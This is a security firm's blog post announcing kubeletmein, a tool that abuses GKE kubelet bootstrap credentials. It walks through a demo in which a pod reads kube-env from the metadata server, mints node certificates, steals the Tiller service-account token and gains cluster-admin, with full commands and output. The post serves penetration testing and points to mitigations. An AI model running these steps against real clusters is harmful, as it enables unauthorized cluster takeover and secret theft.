Kubeletmein - A tool for abusing kubelet credentials


Author Marc Wickenden

Date 6 December 2018

Kubeletmein is a simple tool to exploit cloud provider kubelet TLS bootstrapping techniques and escalate privileges within a Kubernetes cluster.

To fully understand the background to this tool, please read our blog post on kubelet hacking on GKE.

Introduction

Kubeletmein is a single Go binary that you can pull down into your compromised GKE pod. It reads the instance metadata attributes, generates CSRs and submits them for you, then writes out a kubeconfig file you can use with kubectl. It saves a lot of messing about with curl and openssl commands, neither of which may be available in your compromised container.
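
For context, the manual approach kubeletmein automates on GKE looks roughly like the sketch below: pull the kube-env instance attribute from the metadata server and decode the bootstrap credentials out of it. The field names shown (KUBELET_CERT, KUBELET_KEY, CA_CERT) are what kube-env contained at the time of writing, but treat them as an assumption and check the contents on your own cluster.

# rough manual equivalent of what kubeletmein does for you - field names may differ between GKE versions
$ curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" > kube-env
$ grep "^KUBELET_CERT:" kube-env | awk '{print $2}' | base64 -d > kubelet.crt
$ grep "^KUBELET_KEY:" kube-env | awk '{print $2}' | base64 -d > kubelet.key
$ grep "^CA_CERT:" kube-env | awk '{print $2}' | base64 -d > ca.crt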

The source and compiled releases can all be found on our GitHub at https://github.com/4armed/kubeletmein. Pull requests are welcome.

Google Kubernetes Engine Demonstration

Set up a demo cluster

Let’s fire up a quick cluster on Google Kubernetes Engine to try this out. The following steps assume you’ve got a Google Cloud account with billing enabled, a project set up and credentials activated on your workstation. Head to https://cloud.google.com/ if you need to do this. There’s a generous introductory credit offer if you want to play around.

If you accept all the defaults for a standard cluster in the Cloud Console, at the time of writing, you'll end up with a command-line equivalent like the one below. The only things I changed were:

  • Disable HTTP Basic Authentication
  • Disable Client Certificate
  • Enable auto-scaling with a node pool minimum of 1 and maximum of 3
  • Use preemptible nodes

We’ll run this to get up and running.

$ gcloud beta container clusters create "cluster0" --zone "us-central1-a" --no-enable-basic-auth --cluster-version "1.9.7-gke.11" --machine-type "n1-standard-1" --image-type "COS" --disk-type "pd-standard" --disk-size "100" --scopes "https://www.googleapis.com/auth/compute","https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --preemptible --num-nodes "1" --enable-cloud-logging --enable-cloud-monitoring --no-enable-ip-alias --network "default" --subnetwork "default" --enable-autoscaling --min-nodes "1" --max-nodes "3" --addons HorizontalPodAutoscaling,HttpLoadBalancing,KubernetesDashboard --enable-autoupgrade --enable-autorepair

It lives.

Creating cluster cluster0 in us-central1-a...done.
kubeconfig entry generated for cluster0.
NAME      LOCATION       MASTER_VERSION  MASTER_IP     MACHINE_TYPE   NODE_VERSION  NUM_NODES  STATUS
cluster0  us-central1-a  1.9.7-gke.11    35.188.62.53  n1-standard-1  1.9.7-gke.11  3          RUNNING

To make life interesting and give ourselves something to attack, let's install Helm. If you need fuller instructions on Helm, head over to https://docs.helm.sh/using_helm/#installing-helm. Here I will just quickly set up RBAC permissions and install the Tiller.

$ kubectl create -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tiller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: tiller
    namespace: kube-system
EOF
serviceaccount "tiller" created
clusterrolebinding.rbac.authorization.k8s.io "tiller" created

Install the Tiller.

$ helm init --service-account tiller
Tiller (the Helm server-side component) has been installed into your Kubernetes Cluster.

Please note: by default, Tiller is deployed with an insecure 'allow unauthenticated users' policy.
To prevent this, run `helm init` with the --tiller-tls-verify flag.
For more information on securing your installation see: https://docs.helm.sh/using_helm/#securing-your-helm-installation
Happy Helming!

Note the above output. Don't ever do this in production: make sure you use TLS, otherwise you're at risk of cluster compromise. For our purposes, this will do for a demo. It's also worth pointing out that TLS won't prevent what we're about to do. :-D
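
If you do want Tiller with TLS, the install looks something like this sketch, assuming you have already generated a CA plus a Tiller certificate and key (the certificate file names here are placeholders):

# placeholder certificate file names - generate your own CA, cert and key first
$ helm init --service-account tiller --tiller-tls --tiller-tls-verify --tiller-tls-cert tiller.crt --tiller-tls-key tiller.key --tls-ca-cert ca.crt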

All set. Let’s test out kubeletmein.

Download and run kubeletmein

Now let’s run a container in our cluster and use it to exploit the kubelet creds with kubeletmein. Alpine Linux will work just fine.

$ kubectl run -ti --image=alpine --attach alpine -- sh
If you don't see a command prompt, try pressing enter.
$

A small note: by default the above will give you a root prompt with a #. I’ve changed it to $ here, as otherwise the bash syntax highlighting on this page shows all the commands as comments.

Let’s grab kubectl for use later.

$ wget https://storage.googleapis.com/kubernetes-release/release/$(wget -q -O - https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl -O /usr/local/bin/kubectl && chmod +x /usr/local/bin/kubectl
Connecting to storage.googleapis.com (108.177.112.128:443)
kubectl              100% |*********************************************************************************************************************************| 38295k  0:00:00 ETA

Now download kubeletmein. The latest version at the time of writing is 0.5.3.

$ wget https://github.com/4ARMED/kubeletmein/releases/download/v0.5.3/kubeletmein_0.5.3_linux_amd64 -O /usr/local/bin/kubeletmein && chmod +x /usr/local/bin/kubeletmein
Connecting to github.com (192.30.253.112:443)
Connecting to github-production-release-asset-2e65be.s3.amazonaws.com (52.216.138.12:443)
kubeletmein          100% |*********************************************************************************************************************************| 21762k  0:00:00 ETA

The first thing we do is create a bootstrap-kubeconfig file containing the kubelet key and cert taken from the kube-env instance metadata attribute.

$ kubeletmein gke bootstrap
2018-12-06T13:43:26Z []  writing ca cert to: ca-certificates.crt
2018-12-06T13:43:26Z []  writing kubelet cert to: kubelet.crt
2018-12-06T13:43:26Z []  writing kubelet key to: kubelet.key
2018-12-06T13:43:26Z []  generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2018-12-06T13:43:26Z []  wrote bootstrap-kubeconfig
2018-12-06T13:43:26Z []  now generate a new node certificate with: kubeletmein gke generate

You can read the file if you want to. By default it’s written to a file called bootstrap-kubeconfig in the current directory; you can override this with the -b flag.
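
In shape it is just a standard client-certificate kubeconfig pointing at the API server, something along these lines (the server address is a placeholder and the cluster/user/context names are illustrative; the certificate and key files are the ones written out above):

apiVersion: v1
kind: Config
clusters:
- name: gke
  cluster:
    certificate-authority: ca-certificates.crt
    server: https://<master-ip>
users:
- name: kubelet
  user:
    client-certificate: kubelet.crt
    client-key: kubelet.key
contexts:
- name: kubelet
  context:
    cluster: gke
    user: kubelet
current-context: kubelet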

Now generate a new cert. At this point we don’t know our nodes’ names within the cluster, so just use anything for the node name.

$ kubeletmein gke generate -n anything
2018-12-06T13:45:24Z []  using bootstrap-config to request new cert for node: anything
2018-12-06T13:45:24Z []  got new cert and wrote kubeconfig
2018-12-06T13:45:24Z []  now try: kubectl --kubeconfig kubeconfig get pods

That’s it. We now have a kubeconfig file in the current directory which grants system:nodes access via the certificate in the ./pki directory. Test it out.

$ kubectl --kubeconfig kubeconfig get pods
NAME                              READY   STATUS    RESTARTS   AGE
alpine-5498978876-66bbs           1/1     Running   2          35m
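
Incidentally, if openssl happens to be available (it often isn’t in minimal images, as noted earlier), you can confirm the identity the new certificate carries: node client certificates use the system:nodes organisation with a system:node:<name> common name.

# path is illustrative - point it at whichever kubelet-client certificate file kubeletmein wrote under ./pki
$ openssl x509 -in pki/kubelet-client-* -noout -subject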

Hacking Helm with kubelet creds

As we mentioned in our previous post, we can now retrieve secrets, but only those for pods scheduled on the node for which we hold a certificate. This is where kubeletmein speeds up the process significantly, as it will generate the CSR, submit it, and create our kubeconfig for us.

Let’s find which node the Tiller pod, and therefore its RBAC service account token secret, is running on.

$ kubectl --kubeconfig kubeconfig get pods -l app=helm,name=tiller -n kube-system -o wide
NAME                             READY   STATUS    RESTARTS   AGE   IP          NODE                                      NOMINATED NODE   READINESS GATES
tiller-deploy-5c99b8bcbf-w7xq5   1/1     Running   0          18m   10.36.1.8   gke-cluster0-default-pool-eb80ec96-9n9f   <none>           <none>

We can see that the Tiller is deployed to node gke-cluster0-default-pool-eb80ec96-9n9f, so we need a node cert for that node.

First, delete the existing certs in the ./pki directory (the default location).

$ rm pki/kubelet-client-*

Now generate the new one.

$ kubeletmein gke generate -n gke-cluster0-default-pool-eb80ec96-9n9f
2018-12-06T13:56:34Z []  using bootstrap-config to request new cert for node: gke-cluster0-default-pool-eb80ec96-9n9f
2018-12-06T13:56:34Z []  got new cert and wrote kubeconfig
2018-12-06T13:56:34Z []  now try: kubectl --kubeconfig kubeconfig get pods

We just wrote a new kubeconfig. We can now use this to read secrets from node gke-cluster0-default-pool-eb80ec96-9n9f.

$ kubectl --kubeconfig kubeconfig -n kube-system get pod tiller-deploy-5c99b8bcbf-w7xq5 -o jsonpath='{.spec.volumes[0].secret.secretName}{"\n"}'
tiller-token-mr4df

$ kubectl --kubeconfig kubeconfig -n kube-system get secret tiller-token-mr4df -o yaml
apiVersion: v1
data:
  ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURDekNDQWZPZ0F3SUJBZ0lR[..]SUNBVEUtLS0tLQo=
  namespace: a3ViZS1zeXN0ZW0=
  token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SnBjM01pT2lKcmRXSmxjbTVsZEdW[..]dDFZbVV0YzNsemRHVnRPblJwYkd4bGNpSjkuTFpoRnNrUENZYVg2cWlhVDBTeElkRmZGWm9xSDR3eGIxdHhCWkt1UUF0QXpNWGtLaDV0Tnk4MGFOdWRxU0RibTZyNXVhZ21JU2xDejl3VVdrY3lzeVU2dkFWLUdRcWtmVDV4cHIxQy04dUJYZ3pxSmRvM19HZldGVUpfcnZnZTFkd3Y4MW5IcGtuOWV5RGczeWY1SENWYy03LWN1RnRUdHRQU3lqQ2ppLVB1ZnQwZXpkb1h0WmpjcUFXakg0dXgtdXh4TjJRM21tU01sVkFzZGpNQy1zUmk5Y0otTW8wWEc0V0Nab3NTRF9vaHhLZ3pfWmhNd3Q5MnRDRHpUcFkzR1V6NWxVTmZLeTY2NzhTcEZwMVF4YjZWVTJybXd6anQyMHQwXy1weWFMZHJtRHlLdEpEc2NnZ2xHMm1aUFdMZjBUUjdxdUc5NFZYbGNkam9Zd0V3aFVB
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: tiller
    kubernetes.io/service-account.uid: 9cba9310-f95b-11e8-a788-42010a800192
  creationTimestamp: "2018-12-06T13:34:10Z"
  name: tiller-token-mr4df
  namespace: kube-system
  resourceVersion: "4240"
  selfLink: /api/v1/namespaces/kube-system/secrets/tiller-token-mr4df
  uid: 9cbc8029-f95b-11e8-a788-42010a800192
type: kubernetes.io/service-account-token

We can now view the secret object. The token is, like all Kubernetes secrets, base64 encoded. Let’s grab the token and decode it into a file.

$ kubectl --kubeconfig kubeconfig -n kube-system get secret tiller-token-mr4df -o jsonpath='{.data.token}' | base64 -d > tiller-token
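
Service account tokens are JWTs, so out of interest you can peek at the payload claims to confirm which account it belongs to (a quick sketch; the payload is the second dot-separated segment and may need base64 padding added to decode cleanly):

# decode the JWT payload - expect a sub claim of system:serviceaccount:kube-system:tiller
$ cut -d. -f2 tiller-token | base64 -d 2>/dev/null; echo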

Finally, we can use this token to access the API as the tiller service account.

$ kubectl --certificate-authority ca-certificates.crt --token `cat tiller-token` --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secrets
NAME                     TYPE                                  DATA   AGE
default-token-cfbb5      kubernetes.io/service-account-token   3      66m
peeking-cardinal-mysql   Opaque                                2      28m
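
If you want to confirm the level of access before going any further, kubectl can ask the API server directly; with the cluster-admin binding we created for the tiller service account earlier, this should answer yes:

$ kubectl --certificate-authority ca-certificates.crt --token `cat tiller-token` --server https://${KUBERNETES_PORT_443_TCP_ADDR} auth can-i '*' '*'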

Summary

We are now cluster-admin on the Kubernetes cluster. Not bad for a non-privileged container that didn’t have openssl tools installed.

Kubeletmein is designed to help speed up the process of performing security audits of Kubernetes clusters. We use it in our penetration testing services.

Fortunately, it’s relatively straightforward to prevent this type of attack. Please see our kubelet hacking post for mitigation steps.
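
As one example, at the time of writing GKE offers metadata concealment, which stops pods reading kube-env from the metadata server in the first place. Roughly, and treating the exact flag as something to verify against the current GKE documentation, it is enabled at cluster or node pool creation like this:

# beta flag at the time of writing - conceals kube-env and other sensitive metadata from pods
$ gcloud beta container clusters create "cluster1" --zone "us-central1-a" --workload-metadata-from-node=SECURE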


About The Author

Marc Wickenden

Technical Director at 4ARMED, you can blame him for our awesome technical skills and business-led solutions. You can tweet him at @marcwickenden.

